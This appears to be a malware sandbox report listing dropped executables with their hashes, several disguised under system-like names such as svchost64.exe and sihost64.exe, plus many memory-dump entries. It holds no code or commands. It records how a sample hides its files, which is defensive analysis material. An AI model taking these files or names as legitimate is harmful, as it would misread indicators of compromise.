C:\Users\Admin\AppData\Local\Temp\---.exe
MD5
3b8f84394473e3f20ccba33d1b9c6191

SHA1
85e29453fc67e4e278b350b6b79d525cc3e26b0c

SHA256
757ffe1da50601133ff5de5fa7f77c3bef8de506e520c931799456afbc1aa78a

SHA512
33d3a00c0ca75977104e1698511f3ee10b1eb4aeffeca88ffc464dbf8ef03381ae70bf89688745a92e5439e638c3b6471745ec7aa5537528b1ed220adb433fd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\---.exe
MD5
3b8f84394473e3f20ccba33d1b9c6191

SHA1
85e29453fc67e4e278b350b6b79d525cc3e26b0c

SHA256
757ffe1da50601133ff5de5fa7f77c3bef8de506e520c931799456afbc1aa78a

SHA512
33d3a00c0ca75977104e1698511f3ee10b1eb4aeffeca88ffc464dbf8ef03381ae70bf89688745a92e5439e638c3b6471745ec7aa5537528b1ed220adb433fd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\123.exe
MD5
c4ab556b6a1dd537cc1942204fdfd6cd

SHA1
91c8f1c171c1710f78a53ab119959e15549c3931

SHA256
fb07a088ddf5bab17add34ddbdd3d4d15ebff15412cadc4c6cea801244801a79

SHA512
997ad56739814b047ddfe53739660d3a0cc1b6cc3fe813c709048fc8a3af2b8b31a04cd3bfe8716626f96b065aa983176706b28a2da937fda45dcbc43e106a0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\123.exe
MD5
c4ab556b6a1dd537cc1942204fdfd6cd

SHA1
91c8f1c171c1710f78a53ab119959e15549c3931

SHA256
fb07a088ddf5bab17add34ddbdd3d4d15ebff15412cadc4c6cea801244801a79

SHA512
997ad56739814b047ddfe53739660d3a0cc1b6cc3fe813c709048fc8a3af2b8b31a04cd3bfe8716626f96b065aa983176706b28a2da937fda45dcbc43e106a0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
MD5
a94cb8f55447c434784245597c55915a

SHA1
ebdd1fccf1bc8d5c0365d3d4303dff28b3d56aac

SHA256
d1e54f05f382d3ffc60d8bb154b88fc9d058a52a319ee9f533dbaca0ccd06a5b

SHA512
1fa05896b4d91d7e4f63f48c4341f35ed9b1c0cb96bc9009902f603ea5e5794ec307779511a8c9e3d8773936612df290ce9ec6c047e9d1369d276d49ca8730ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
MD5
a94cb8f55447c434784245597c55915a

SHA1
ebdd1fccf1bc8d5c0365d3d4303dff28b3d56aac

SHA256
d1e54f05f382d3ffc60d8bb154b88fc9d058a52a319ee9f533dbaca0ccd06a5b

SHA512
1fa05896b4d91d7e4f63f48c4341f35ed9b1c0cb96bc9009902f603ea5e5794ec307779511a8c9e3d8773936612df290ce9ec6c047e9d1369d276d49ca8730ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
MD5
2c3a40319a1c32c7c912ca07cc97e51f

SHA1
46cd840f3616d8a7fcde0279d6f64be7b6d0e0c2

SHA256
2f776677451dedb6aa2041753184d1f3b1599987263cb7776ab4e48576d77c1e

SHA512
c92408d7e74cd9c111e743a6193724dd8ea74aa1f78379ecc7b6277f0d381e11a0b2bb4a5e935fecd375743a89772f47a7e78c7cbe48a22abecd9390beea2851

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
MD5
2c3a40319a1c32c7c912ca07cc97e51f

SHA1
46cd840f3616d8a7fcde0279d6f64be7b6d0e0c2

SHA256
2f776677451dedb6aa2041753184d1f3b1599987263cb7776ab4e48576d77c1e

SHA512
c92408d7e74cd9c111e743a6193724dd8ea74aa1f78379ecc7b6277f0d381e11a0b2bb4a5e935fecd375743a89772f47a7e78c7cbe48a22abecd9390beea2851

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
MD5
2c3a40319a1c32c7c912ca07cc97e51f

SHA1
46cd840f3616d8a7fcde0279d6f64be7b6d0e0c2

SHA256
2f776677451dedb6aa2041753184d1f3b1599987263cb7776ab4e48576d77c1e

SHA512
c92408d7e74cd9c111e743a6193724dd8ea74aa1f78379ecc7b6277f0d381e11a0b2bb4a5e935fecd375743a89772f47a7e78c7cbe48a22abecd9390beea2851

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
MD5
2c3a40319a1c32c7c912ca07cc97e51f

SHA1
46cd840f3616d8a7fcde0279d6f64be7b6d0e0c2

SHA256
2f776677451dedb6aa2041753184d1f3b1599987263cb7776ab4e48576d77c1e

SHA512
c92408d7e74cd9c111e743a6193724dd8ea74aa1f78379ecc7b6277f0d381e11a0b2bb4a5e935fecd375743a89772f47a7e78c7cbe48a22abecd9390beea2851

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
dbd399ad19db67986885ae73860583a1

SHA1
0981d845da6a8cde0913d08cdcdcacaced6d7141

SHA256
b4563d2f26a78c16789c86d4aeff3a038832b6af46947fc5e79e51f0bce717f9

SHA512
b3198db63958dbad486df7aa067c44b839d8af833f41b08b396ac5f728726428462b25452b82e5cb2500e046e0f7d81dc994808935eabae40ee2ac5d3e068134

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
dbd399ad19db67986885ae73860583a1

SHA1
0981d845da6a8cde0913d08cdcdcacaced6d7141

SHA256
b4563d2f26a78c16789c86d4aeff3a038832b6af46947fc5e79e51f0bce717f9

SHA512
b3198db63958dbad486df7aa067c44b839d8af833f41b08b396ac5f728726428462b25452b82e5cb2500e046e0f7d81dc994808935eabae40ee2ac5d3e068134

Download Submit
C:\Users\Admin\AppData\Roaming\runtimeservice.exe
MD5
c4ab556b6a1dd537cc1942204fdfd6cd

SHA1
91c8f1c171c1710f78a53ab119959e15549c3931

SHA256
fb07a088ddf5bab17add34ddbdd3d4d15ebff15412cadc4c6cea801244801a79

SHA512
997ad56739814b047ddfe53739660d3a0cc1b6cc3fe813c709048fc8a3af2b8b31a04cd3bfe8716626f96b065aa983176706b28a2da937fda45dcbc43e106a0f

Download Submit
C:\Users\Admin\AppData\Roaming\runtimeservice.exe
MD5
c4ab556b6a1dd537cc1942204fdfd6cd

SHA1
91c8f1c171c1710f78a53ab119959e15549c3931

SHA256
fb07a088ddf5bab17add34ddbdd3d4d15ebff15412cadc4c6cea801244801a79

SHA512
997ad56739814b047ddfe53739660d3a0cc1b6cc3fe813c709048fc8a3af2b8b31a04cd3bfe8716626f96b065aa983176706b28a2da937fda45dcbc43e106a0f

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe
MD5
9985f93e2252151209373c6153580ea2

SHA1
9accba8256ac144683f68383ae5f4a42a152c944

SHA256
b926a848e4db6e878ae8206a152e38e56b27905e1219a85bede8fe7a1ebcbc68

SHA512
27f3501abe230aa2ecba0ff3f8b1c2362d49bd80160e08cfccf99e6683e1a1441297d0b896277f4d33200e6ed53b8f78825d00965f0e0ae4481afaf94bda6306

Download Submit
C:\Windows\System32\services64.exe
MD5
a94cb8f55447c434784245597c55915a

SHA1
ebdd1fccf1bc8d5c0365d3d4303dff28b3d56aac

SHA256
d1e54f05f382d3ffc60d8bb154b88fc9d058a52a319ee9f533dbaca0ccd06a5b

SHA512
1fa05896b4d91d7e4f63f48c4341f35ed9b1c0cb96bc9009902f603ea5e5794ec307779511a8c9e3d8773936612df290ce9ec6c047e9d1369d276d49ca8730ed

Download Submit
C:\Windows\system32\Microsoft\Libs\sihost64.exe
MD5
9985f93e2252151209373c6153580ea2

SHA1
9accba8256ac144683f68383ae5f4a42a152c944

SHA256
b926a848e4db6e878ae8206a152e38e56b27905e1219a85bede8fe7a1ebcbc68

SHA512
27f3501abe230aa2ecba0ff3f8b1c2362d49bd80160e08cfccf99e6683e1a1441297d0b896277f4d33200e6ed53b8f78825d00965f0e0ae4481afaf94bda6306

Download Submit
C:\Windows\system32\services64.exe
MD5
a94cb8f55447c434784245597c55915a

SHA1
ebdd1fccf1bc8d5c0365d3d4303dff28b3d56aac

SHA256
d1e54f05f382d3ffc60d8bb154b88fc9d058a52a319ee9f533dbaca0ccd06a5b

SHA512
1fa05896b4d91d7e4f63f48c4341f35ed9b1c0cb96bc9009902f603ea5e5794ec307779511a8c9e3d8773936612df290ce9ec6c047e9d1369d276d49ca8730ed

Download Submit
memory/8-520-0x0000000000000000-mapping.dmp

Download
memory/344-349-0x0000000000000000-mapping.dmp

Download
memory/652-485-0x0000000000000000-mapping.dmp

Download
memory/976-428-0x0000000000000000-mapping.dmp

Download
memory/1192-194-0x00007FF690DD0000-0x00007FF690DD1000-memory.dmp

Filesize
4KB

Download
memory/1192-202-0x0000000022E70000-0x0000000022E72000-memory.dmp

Filesize
8KB

Download
memory/1192-191-0x0000000000000000-mapping.dmp

Download
memory/1608-469-0x0000000000000000-mapping.dmp

Download
memory/1712-549-0x0000000000000000-mapping.dmp

Download
memory/1736-186-0x0000000000000000-mapping.dmp

Download
memory/1736-188-0x0000000000040000-0x0000000000041000-memory.dmp

Filesize
4KB

Download
memory/1736-189-0x0000000000040000-0x0000000000041000-memory.dmp

Filesize
4KB

Download
memory/1752-196-0x0000000000000000-mapping.dmp

Download
memory/1924-206-0x0000021941300000-0x0000021941301000-memory.dmp

Filesize
4KB

Download
memory/1924-227-0x0000021940886000-0x0000021940888000-memory.dmp

Filesize
8KB

Download
memory/1924-204-0x0000021940883000-0x0000021940885000-memory.dmp

Filesize
8KB

Download
memory/1924-201-0x0000021928540000-0x0000021928542000-memory.dmp

Filesize
8KB

Download
memory/1924-200-0x0000021928540000-0x0000021928542000-memory.dmp

Filesize
8KB

Download
memory/1924-199-0x0000021928540000-0x0000021928542000-memory.dmp

Filesize
8KB

Download
memory/1924-198-0x0000021928540000-0x0000021928542000-memory.dmp

Filesize
8KB

Download
memory/1924-197-0x0000000000000000-mapping.dmp

Download
memory/1924-205-0x0000021928540000-0x0000021928542000-memory.dmp

Filesize
8KB

Download
memory/1924-203-0x0000021940880000-0x0000021940882000-memory.dmp

Filesize
8KB

Download
memory/1924-215-0x0000021928540000-0x0000021928542000-memory.dmp

Filesize
8KB

Download
memory/1924-250-0x0000021940888000-0x0000021940889000-memory.dmp

Filesize
4KB

Download
memory/1924-214-0x0000021928540000-0x0000021928542000-memory.dmp

Filesize
8KB

Download
memory/1924-207-0x0000021928540000-0x0000021928542000-memory.dmp

Filesize
8KB

Download
memory/1924-208-0x0000021928540000-0x0000021928542000-memory.dmp

Filesize
8KB

Download
memory/1924-209-0x0000021941430000-0x0000021941431000-memory.dmp

Filesize
4KB

Download
memory/1924-210-0x0000021928540000-0x0000021928542000-memory.dmp

Filesize
8KB

Download
memory/1976-484-0x0000000000000000-mapping.dmp

Download
memory/2000-288-0x0000000000000000-mapping.dmp

Download
memory/2064-156-0x0000000002890000-0x0000000002891000-memory.dmp

Filesize
4KB

Download
memory/2064-127-0x00000000034D0000-0x00000000034D1000-memory.dmp

Filesize
4KB

Download
memory/2064-178-0x0000000007680000-0x0000000007681000-memory.dmp

Filesize
4KB

Download
memory/2064-179-0x0000000007850000-0x0000000007851000-memory.dmp

Filesize
4KB

Download
memory/2064-180-0x0000000007E80000-0x0000000007E81000-memory.dmp

Filesize
4KB

Download
memory/2064-116-0x0000000000C40000-0x0000000000CA0000-memory.dmp

Filesize
384KB

Download
memory/2064-176-0x0000000006F10000-0x0000000006F11000-memory.dmp

Filesize
4KB

Download
memory/2064-175-0x0000000006BD0000-0x0000000006BD1000-memory.dmp

Filesize
4KB

Download
memory/2064-119-0x00000000027B0000-0x00000000027B1000-memory.dmp

Filesize
4KB

Download
memory/2064-174-0x0000000006AE0000-0x0000000006AE1000-memory.dmp

Filesize
4KB

Download
memory/2064-173-0x00000000065D0000-0x00000000065D1000-memory.dmp

Filesize
4KB

Download
memory/2064-172-0x0000000006540000-0x0000000006541000-memory.dmp

Filesize
4KB

Download
memory/2064-171-0x0000000006430000-0x0000000006431000-memory.dmp

Filesize
4KB

Download
memory/2064-170-0x00000000063B0000-0x00000000063B1000-memory.dmp

Filesize
4KB

Download
memory/2064-169-0x00000000062A0000-0x00000000062A1000-memory.dmp

Filesize
4KB

Download
memory/2064-168-0x0000000006270000-0x0000000006271000-memory.dmp

Filesize
4KB

Download
memory/2064-167-0x0000000005BD0000-0x0000000005BD1000-memory.dmp

Filesize
4KB

Download
memory/2064-165-0x0000000000400000-0x0000000000402000-memory.dmp

Filesize
8KB

Download
memory/2064-164-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/2064-163-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/2064-162-0x0000000002630000-0x0000000002631000-memory.dmp

Filesize
4KB

Download
memory/2064-161-0x00000000028E0000-0x00000000028E1000-memory.dmp

Filesize
4KB

Download
memory/2064-160-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/2064-159-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/2064-157-0x0000000002880000-0x0000000002881000-memory.dmp

Filesize
4KB

Download
memory/2064-158-0x00000000028F0000-0x00000000028F1000-memory.dmp

Filesize
4KB

Download
memory/2064-117-0x00000000027F0000-0x00000000027F1000-memory.dmp

Filesize
4KB

Download
memory/2064-154-0x0000000002860000-0x0000000002861000-memory.dmp

Filesize
4KB

Download
memory/2064-155-0x00000000028D0000-0x00000000028D1000-memory.dmp

Filesize
4KB

Download
memory/2064-153-0x00000000028B0000-0x00000000028B1000-memory.dmp

Filesize
4KB

Download
memory/2064-152-0x00000000028A0000-0x00000000028A1000-memory.dmp

Filesize
4KB

Download
memory/2064-151-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/2064-150-0x00000000034D0000-0x00000000034D1000-memory.dmp

Filesize
4KB

Download
memory/2064-149-0x00000000034D0000-0x00000000034D1000-memory.dmp

Filesize
4KB

Download
memory/2064-148-0x00000000034D0000-0x00000000034D1000-memory.dmp

Filesize
4KB

Download
memory/2064-144-0x0000000002710000-0x0000000002711000-memory.dmp

Filesize
4KB

Download
memory/2064-120-0x0000000002820000-0x0000000002821000-memory.dmp

Filesize
4KB

Download
memory/2064-118-0x0000000002800000-0x0000000002801000-memory.dmp

Filesize
4KB

Download
memory/2064-122-0x00000000027D0000-0x00000000027D1000-memory.dmp

Filesize
4KB

Download
memory/2064-146-0x00000000034D0000-0x00000000034D1000-memory.dmp

Filesize
4KB

Download
memory/2064-123-0x0000000002840000-0x0000000002841000-memory.dmp

Filesize
4KB

Download
memory/2064-121-0x00000000027E0000-0x00000000027E1000-memory.dmp

Filesize
4KB

Download
memory/2064-147-0x00000000034D0000-0x00000000034D1000-memory.dmp

Filesize
4KB

Download
memory/2064-124-0x0000000002810000-0x0000000002811000-memory.dmp

Filesize
4KB

Download
memory/2064-145-0x0000000002790000-0x0000000002791000-memory.dmp

Filesize
4KB

Download
memory/2064-125-0x0000000000400000-0x000000000075E000-memory.dmp

Filesize
3.4MB

Download
memory/2064-126-0x00000000034E0000-0x00000000034E1000-memory.dmp

Filesize
4KB

Download
memory/2064-128-0x00000000034D0000-0x00000000034D1000-memory.dmp

Filesize
4KB

Download
memory/2064-129-0x00000000034D0000-0x00000000034D1000-memory.dmp

Filesize
4KB

Download
memory/2064-143-0x0000000002730000-0x0000000002731000-memory.dmp

Filesize
4KB

Download
memory/2064-140-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/2064-131-0x00000000025D0000-0x00000000025D1000-memory.dmp

Filesize
4KB

Download
memory/2064-132-0x00000000025E0000-0x00000000025E1000-memory.dmp

Filesize
4KB

Download
memory/2064-142-0x0000000002770000-0x0000000002771000-memory.dmp

Filesize
4KB

Download
memory/2064-130-0x00000000034D0000-0x00000000034D1000-memory.dmp

Filesize
4KB

Download
memory/2064-177-0x0000000007080000-0x0000000007081000-memory.dmp

Filesize
4KB

Download
memory/2064-133-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/2064-135-0x0000000002600000-0x0000000002601000-memory.dmp

Filesize
4KB

Download
memory/2064-134-0x00000000025B0000-0x00000000025B1000-memory.dmp

Filesize
4KB

Download
memory/2064-141-0x00000000026F0000-0x00000000026F1000-memory.dmp

Filesize
4KB

Download
memory/2064-137-0x00000000034D0000-0x00000000034D1000-memory.dmp

Filesize
4KB

Download
memory/2064-138-0x00000000034D0000-0x00000000034D1000-memory.dmp

Filesize
4KB

Download
memory/2064-136-0x0000000002620000-0x0000000002621000-memory.dmp

Filesize
4KB

Download
memory/2064-139-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/2088-596-0x0000000000000000-mapping.dmp

Download
memory/2128-374-0x0000000000000000-mapping.dmp

Download
memory/2148-443-0x0000000000000000-mapping.dmp

Download
memory/2200-386-0x0000000000000000-mapping.dmp

Download
memory/2320-476-0x0000000000000000-mapping.dmp

Download
memory/2380-597-0x0000000000000000-mapping.dmp

Download
memory/2440-335-0x0000000000000000-mapping.dmp

Download
memory/2440-356-0x000001EF5D8B0000-0x000001EF5D8B2000-memory.dmp

Filesize
8KB

Download
memory/2752-256-0x0000000000000000-mapping.dmp

Download
memory/3124-545-0x0000000000000000-mapping.dmp

Download
memory/3164-258-0x0000000000000000-mapping.dmp

Download
memory/3164-295-0x0000000009AD0000-0x0000000009AD2000-memory.dmp

Filesize
8KB

Download
memory/3212-241-0x0000019E1D7C0000-0x0000019E1D7C2000-memory.dmp

Filesize
8KB

Download
memory/3212-296-0x0000019E1D938000-0x0000019E1D939000-memory.dmp

Filesize
4KB

Download
memory/3212-242-0x0000019E1D7C0000-0x0000019E1D7C2000-memory.dmp

Filesize
8KB

Download
memory/3212-243-0x0000019E1D7C0000-0x0000019E1D7C2000-memory.dmp

Filesize
8KB

Download
memory/3212-245-0x0000019E1D7C0000-0x0000019E1D7C2000-memory.dmp

Filesize
8KB

Download
memory/3212-281-0x0000019E1D936000-0x0000019E1D938000-memory.dmp

Filesize
8KB

Download
memory/3212-240-0x0000019E1D7C0000-0x0000019E1D7C2000-memory.dmp

Filesize
8KB

Download
memory/3212-238-0x0000000000000000-mapping.dmp

Download
memory/3212-252-0x0000019E1D933000-0x0000019E1D935000-memory.dmp

Filesize
8KB

Download
memory/3212-251-0x0000019E1D930000-0x0000019E1D932000-memory.dmp

Filesize
8KB

Download
memory/3256-504-0x0000000000000000-mapping.dmp

Download
memory/3276-297-0x0000021DF5D60000-0x0000021DF5D62000-memory.dmp

Filesize
8KB

Download
memory/3276-332-0x0000021DF5D66000-0x0000021DF5D68000-memory.dmp

Filesize
8KB

Download
memory/3276-333-0x0000021DF5D68000-0x0000021DF5D69000-memory.dmp

Filesize
4KB

Download
memory/3276-299-0x0000021DF5D63000-0x0000021DF5D65000-memory.dmp

Filesize
8KB

Download
memory/3276-290-0x0000000000000000-mapping.dmp

Download
memory/3540-381-0x0000000000000000-mapping.dmp

Download
memory/3616-517-0x000000014030F3F8-mapping.dmp

Download
memory/3676-184-0x0000000000C60000-0x0000000000C61000-memory.dmp

Filesize
4KB

Download
memory/3676-181-0x0000000000000000-mapping.dmp

Download
memory/3692-493-0x0000000000000000-mapping.dmp

Download
memory/3840-602-0x0000000000000000-mapping.dmp

Download
memory/3912-483-0x0000000000000000-mapping.dmp

Download
memory/3928-287-0x0000000000000000-mapping.dmp

Download
memory/3952-346-0x0000000000000000-mapping.dmp

Download
memory/4052-433-0x0000000000000000-mapping.dmp

Download